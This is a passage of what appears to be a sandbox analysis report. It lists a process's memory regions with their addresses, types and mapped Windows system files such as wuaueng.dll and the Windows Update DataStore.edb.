start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2319 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2320 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2321 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2322 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2323 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2324 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2325 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2326 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 2327 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2328 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 2354 start_va = 0xfd0000 end_va = 0xfebfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 2896 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2897 start_va = 0x1ea0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 2898 start_va = 0x25b0000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2899 start_va = 0x2ac0000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 2900 start_va = 0x1170000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 2901 start_va = 0x1ff0000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 2902 start_va = 0x26d0000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 2903 start_va = 0x2d00000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2904 start_va = 0x3170000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 2905 start_va = 0x3420000 end_va = 0x349ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 2906 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 2907 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 2908 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 2909 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 2910 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 2911 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 2912 start_va = 0x36b0000 end_va = 0x3aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 2913 start_va = 0x34a0000 end_va = 0x351ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 2914 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 2915 start_va = 0x7fefaf80000 end_va = 0x7fefaf96fff monitored = 0 entry_point = 0x7fefaf89d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 2916 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 2917 start_va = 0x2b90000 end_va = 0x2c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 2918 start_va = 0x2eb0000 end_va = 0x2f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 2919 start_va = 0x3ac0000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ac0000" filename = "" Region: id = 2920 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 2921 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 2922 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 3273 start_va = 0x12f0000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 3274 start_va = 0x25b0000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 3275 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 3276 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 3277 start_va = 0x1fe0000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 3278 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 3279 start_va = 0x2ac0000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 3280 start_va = 0x2c70000 end_va = 0x2ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 3281 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 3282 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 3283 start_va = 0x3220000 end_va = 0x329ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 3284 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 3285 start_va = 0x1170000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 3286 start_va = 0x3540000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 3287 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 3288 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 3289 start_va = 0x7fef3820000 end_va = 0x7fef3a72fff monitored = 0 entry_point = 0x7fef382236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 3290 start_va = 0x7fef6c50000 end_va = 0x7fef6ec9fff monitored = 0 entry_point = 0x7fef6c82200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 3291 start_va = 0x7fef5b40000 end_va = 0x7fef5bb0fff monitored = 0 entry_point = 0x7fef5b7ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3292 start_va = 0x7fef9b30000 end_va = 0x7fef9ba0fff monitored = 0 entry_point = 0x7fef9b31010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3293 start_va = 0x7fef9ac0000 end_va = 0x7fef9b23fff monitored = 0 entry_point = 0x7fef9ac1254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3294 start_va = 0x7fef3a80000 end_va = 0x7fef3a9afff monitored = 0 entry_point = 0x7fef3a81198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3295 start_va = 0x7fef3810000 end_va = 0x7fef381efff monitored = 0 entry_point = 0x7fef3819a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 3296 start_va = 0x3b40000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 3297 start_va = 0x76f80000 end_va = 0x76f86fff monitored = 0 entry_point = 0x76f8106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 3298 start_va = 0x3c40000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 3299 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3300 start_va = 0x7c0000 end_va = 0x7c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3301 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3302 start_va = 0x7c0000 end_va = 0x7c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3303 start_va = 0x7fefc750000 end_va = 0x7fefc757fff monitored = 0 entry_point = 0x7fefc752a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 3304 start_va = 0x7fef3800000 end_va = 0x7fef380cfff monitored = 0 entry_point = 0x7fef3801104 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 3305 start_va = 0x7fef3800000 end_va = 0x7fef380efff monitored = 0 entry_point = 0x7fef3806fb0 region_type = mapped_file name = "wups2.dll" filename = "\\Windows\\System32\\wups2.dll" (normalized: "c:\\windows\\system32\\wups2.dll") Region: id = 3306 start_va = 0x3150000 end_va = 0x320ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3307 start_va = 0x7b0000 end_va = 0x7c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 3308 start_va = 0x3d40000 end_va = 0x3e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 3309 start_va = 0x3e40000 end_va = 0x3f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 3310 start_va = 0x3f40000 end_va = 0x403ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 3311 start_va = 0x4040000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 3312 start_va = 0x7d0000 end_va = 0x7d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 3313 start_va = 0x1cd0000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 3314 start_va = 0x1cd0000 end_va = 0x1cdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cd0000" filename = "" Region: id = 3315 start_va = 0x1ce0000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ce0000" filename = "" Region: id = 3316 start_va = 0x1cf0000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cf0000" filename = "" Region: id = 3317 start_va = 0x1d00000 end_va = 0x1d0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d00000" filename = "" Region: id = 3318 start_va = 0x1d10000 end_va = 0x1d1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 3319 start_va = 0x1d20000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d20000" filename = "" Region: id = 3320 start_va = 0x7e0000 end_va = 0x7e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 3321 start_va = 0x3c80000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 3322 start_va = 0x3d30000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d30000" filename = "" Region: id = 3323 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 3324 start_va = 0x4140000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 3325 start_va = 0x4240000 end_va = 0x433ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 3326 start_va = 0x1e40000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3327 start_va = 0x1e40000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 3328 start_va = 0x1e50000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 3329 start_va = 0x1e60000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 3330 start_va = 0x1e70000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 3331 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3332 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 3333 start_va = 0x7f0000 end_va = 0x7f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 3334 start_va = 0x4340000 end_va = 0x533ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 3335 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3336 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 3337 start_va = 0x1070000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 3338 start_va = 0x1080000 end_va = 0x1080fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 3339 start_va = 0x1090000 end_va = 0x1091fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 3340 start_va = 0x2340000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 3341 start_va = 0x2340000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 3342 start_va = 0x2380000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 3343 start_va = 0x1120000 end_va = 0x1120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 3344 start_va = 0x2340000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 3345 start_va = 0x2340000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 3346 start_va = 0x2380000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 3347 start_va = 0x5340000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 3348 start_va = 0x5340000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005340000" filename = "" Region: id = 3349 start_va = 0x1130000 end_va = 0x1130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 3350 start_va = 0x2340000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 3351 start_va = 0x2340000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 3352 start_va = 0x2380000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 3353 start_va = 0x1130000 end_va = 0x1130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 3354 start_va = 0x1140000 end_va = 0x1141fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 3355 start_va = 0x2340000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 3356 start_va = 0x2340000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 3357 start_va = 0x2380000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 3358 start_va = 0x5340000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 3359 start_va = 0x5340000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005340000" filename = "" Region: id = 3360 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 3361 start_va = 0x2340000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 3362 start_va = 0x2340000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 3363 start_va = 0x2380000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 3364 start_va = 0x1130000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 3365 start_va = 0x1140000 end_va = 0x1147fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 3366 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3367 start_va = 0x11f0000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3368 start_va = 0x1370000 end_va = 0x1377fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 3369 start_va = 0x1380000 end_va = 0x1387fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 3370 start_va = 0x1390000 end_va = 0x1397fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 3371 start_va = 0x1370000 end_va = 0x1371fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 3372 start_va = 0x1370000 end_va = 0x1377fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 3373 start_va = 0x13a0000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 3374 start_va = 0x13a0000 end_va = 0x13a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 3375 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3376 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3377 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3378 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3379 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3380 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3381 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3382 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3383 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3384 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3385 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3386 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3387 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3388 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3389 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3390 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3391 start_va = 0x2a40000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 3392 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 3393 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3394 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3395 start_va = 0x13a0000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 3396 start_va = 0x1430000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 3397 start_va = 0x1540000 end_va = 0x154ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 3398 start_va = 0x1380000 end_va = 0x138ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3399 start_va = 0x1390000 end_va = 0x139ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3400 start_va = 